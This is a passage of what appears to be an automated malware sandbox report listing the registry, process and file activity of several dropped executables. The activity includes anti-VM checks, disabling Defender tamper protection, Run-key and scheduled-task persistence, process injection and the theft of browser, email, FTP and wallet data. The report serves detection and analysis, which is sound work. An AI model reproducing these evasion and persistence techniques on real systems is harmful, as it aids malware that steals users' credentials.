| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\32dbcb8133.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\32dbcb8133.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3c485884af.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091759001\\3c485884af.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\759b6f5ccf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091760001\\759b6f5ccf.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2672 set thread context of 2532 | N/A | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| PID 4928 set thread context of 6036 | N/A | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4968 set thread context of 6028 | N/A | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 5956 set thread context of 6092 | N/A | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
| PID 5688 set thread context of 4816 | N/A | C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091749001\e17928dd7b.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091693101\32dbcb8133.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091747001\8bda17f23a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\1091761001\6f0a47fed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133848770725900965" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
